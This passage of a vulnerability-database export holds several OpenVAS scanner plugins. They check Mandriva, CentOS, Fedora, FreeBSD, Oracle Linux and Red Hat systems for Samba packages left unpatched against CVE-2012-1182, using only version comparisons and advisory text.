exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:35", "description": "Check for the Version of libsmbclient", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-26T00:00:00", "id": "OPENVAS:881179", "href": "http://plugins.openvas.org/nasl.php?oid=881179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"libsmbclient on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\");\n script_id(881179);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6349", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6349\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864213\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:46:43 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-6349\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6349\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"samba4 on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~26.alpha11.fc15.6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:11", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: samba34", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231071279", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_samba342.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID baf37cd2-8351-11e1-894e-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71279\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:26 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"FreeBSD Ports: samba34\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n samba34\n samba35\n samba36\n\nCVE-2012-1182\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\narray length in a manner consistent with validation of array memory\nallocation, which allows remote attackers to execute arbitrary code\nvia a crafted RPC call.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"samba34\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4\")>0 && revcomp(a:bver, b:\"3.4.16\")<0) {\n txt += \"Package samba34 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nbver = portver(pkg:\"samba35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5\")>0 && revcomp(a:bver, b:\"3.5.14\")<0) {\n txt += \"Package samba35 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nbver = portver(pkg:\"samba36\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6\")>0 && revcomp(a:bver, b:\"3.6.4\")<0) {\n txt += \"Package samba36 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:00", "description": "Oracle Linux Local Security Checks ELSA-2012-0466", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0466", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123943", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0466.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123943\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:38 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0466\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0466 - samba3x security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0466\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0466.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba3x RHSA-2012:0466-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2012:0466-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00003.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870584\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:47 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0466-01\");\n script_name(\"RedHat Update for samba3x RHSA-2012:0466-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba3x on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 